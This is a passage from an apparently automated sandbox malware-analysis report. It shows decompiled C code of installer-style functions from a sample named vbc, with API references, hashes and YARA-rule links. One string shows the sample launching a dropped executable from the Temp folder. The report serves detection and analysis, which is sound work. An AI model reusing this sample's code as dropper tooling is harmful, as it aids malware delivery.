				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x7a8ab0 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                          0x00402fa3
                                          0x00402fb1
                                          0x00402fb7
                                          0x00402fb7
                                          0x00402fc5
                                          0x00402fc7
                                          0x00402fd3
                                          0x00402fd8
                                          0x00402fda
                                          0x00402fda
                                          0x00402fe5
                                          0x00402ff5
                                          0x00403007
                                          0x00403007
                                          0x0040300f

                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                          • wsprintfW.USER32 ref: 00402FE5
                                          • SetWindowTextW.USER32 ref: 00402FF5
                                          • SetDlgItemTextW.USER32 ref: 00403007
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                          • API String ID: 1451636040-1158693248
                                          • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                                          • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
                                          • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                                          • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FB4(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406139(_t55);
				_t29 = E0040615E(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8ab4;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035FE(_t49);
							E004035E8(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                          0x00402950
                                          0x00402952
                                          0x00402957
                                          0x0040295c
                                          0x0040295f
                                          0x00402969
                                          0x0040296d
                                          0x0040296d
                                          0x00402973
                                          0x00402980
                                          0x00402988
                                          0x0040298b
                                          0x00402997
                                          0x0040299a
                                          0x004029a0
                                          0x004029ae
                                          0x004029b3
                                          0x004029b7
                                          0x004029ba
                                          0x004029c3
                                          0x004029cf
                                          0x004029d3
                                          0x004029d6
                                          0x004029e0
                                          0x004029ff
                                          0x004029e7
                                          0x004029ec
                                          0x004029f4
                                          0x004029f7
                                          0x004029fc
                                          0x004029fc
                                          0x00402a06
                                          0x00402a06
                                          0x00402a13
                                          0x00402a19
                                          0x00402a1f
                                          0x00402a1f
                                          0x004029b7
                                          0x00402a33
                                          0x00402a35
                                          0x00402a35
                                          0x00402a3f
                                          0x00402a40
                                          0x00402a44
                                          0x00402a48
                                          0x00402a4e
                                          0x00402a4e
                                          0x00402a55
                                          0x004022f1
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                          • GlobalFree.KERNEL32(?), ref: 00402A06
                                          • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                          • CloseHandle.KERNEL32(?), ref: 00402A35
                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                          • String ID:
                                          • API String ID: 2667972263-0
                                          • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                                          • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
                                          • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                                          • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A3B(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                          0x00402eb4
                                          0x00402ebd
                                          0x00402ec6
                                          0x00402ed2
                                          0x00402edb
                                          0x00402ee5
                                          0x00402f0a
                                          0x00402f10
                                          0x00402f15
                                          0x00402f16
                                          0x00402f46
                                          0x00402f1f
                                          0x00402f21
                                          0x00402f71
                                          0x00402f74
                                          0x00000000
                                          0x00402f7a
                                          0x00402f30
                                          0x00402f35
                                          0x00402f37
                                          0x00000000
                                          0x00000000
                                          0x00402f3f
                                          0x00402f44
                                          0x00402f45
                                          0x00402f45
                                          0x00402f52
                                          0x00402f5a
                                          0x00402f61
                                          0x00000000
                                          0x00402f8a
                                          0x00000000
                                          0x00402f69
                                          0x00402ef5
                                          0x00402f08
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402f08
                                          0x00402f90

                                          APIs
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                          • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                          • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CloseEnum$DeleteValue
                                          • String ID:
                                          • API String ID: 1354259210-0
                                          • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                          • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
                                          • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                          • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                          0x00401d81
                                          0x00401d85
                                          0x00401d9a
                                          0x00401d87
                                          0x00401d89
                                          0x00401d8f
                                          0x00401d8f
                                          0x00401da0
                                          0x00401da3
                                          0x00401dad
                                          0x00401db0
                                          0x00401db8
                                          0x00401dc9
                                          0x00401dcc
                                          0x00401dd7
                                          0x00401dce
                                          0x00401dd0
                                          0x00401dd0
                                          0x00401ddb
                                          0x00401de5
                                          0x00401e0c
                                          0x00401e1b
                                          0x00401e29
                                          0x00401e31
                                          0x00401e39
                                          0x00401e39
                                          0x00401e42
                                          0x00401e48
                                          0x00402ba4
                                          0x00402ba4
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 00401D9A
                                          • GetClientRect.USER32 ref: 00401DE5
                                          • LoadImageW.USER32 ref: 00401E15
                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                          • DeleteObject.GDI32(00000000), ref: 00401E39
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                                          • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
                                          • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                                          • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065B5();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                          0x00401e4e
                                          0x00401e59
                                          0x00401e5b
                                          0x00401e68
                                          0x00401e7f
                                          0x00401e84
                                          0x00401e91
                                          0x00401e96
                                          0x00401e9a
                                          0x00401ea5
                                          0x00401eac
                                          0x00401ebe
                                          0x00401ec4
                                          0x00401ec9
                                          0x00401ed3
                                          0x00402638
                                          0x0040156d
                                          0x00402ba4
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • GetDC.USER32(?), ref: 00401E51
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                          • MulDiv.KERNEL32 ref: 00401E73
                                          • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                            • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
                                            • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2584051700-0
                                          • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                          • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
                                          • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                          • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                          0x00401c43
                                          0x00401c45
                                          0x00401c4c
                                          0x00401c4f
                                          0x00401c52
                                          0x00401c5c
                                          0x00401c60
                                          0x00401c63
                                          0x00401c6c
                                          0x00401c6c
                                          0x00401c6f
                                          0x00401c73
                                          0x00401c7c
                                          0x00401c7c
                                          0x00401c7f
                                          0x00401c83
                                          0x00401c85
                                          0x00401cda
                                          0x00401cdc
                                          0x00401ce7
                                          0x00401cf1
                                          0x00401cf4
                                          0x00401cf4
                                          0x00401cfd
                                          0x00000000
                                          0x00401c87
                                          0x00401c8e
                                          0x00401c90
                                          0x00401c93
                                          0x00401c99
                                          0x00401ca0
                                          0x00401ca3
                                          0x00401ccb
                                          0x00401d03
                                          0x00401d03
                                          0x00401ca5
                                          0x00401cb3
                                          0x00401cbb
                                          0x00401cbe
                                          0x00401cbe
                                          0x00401ca3
                                          0x00401d06
                                          0x00401d09
                                          0x00401d0f
                                          0x00402ba4
                                          0x00402ba4
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                                          • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
                                          • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                                          • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404E77 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
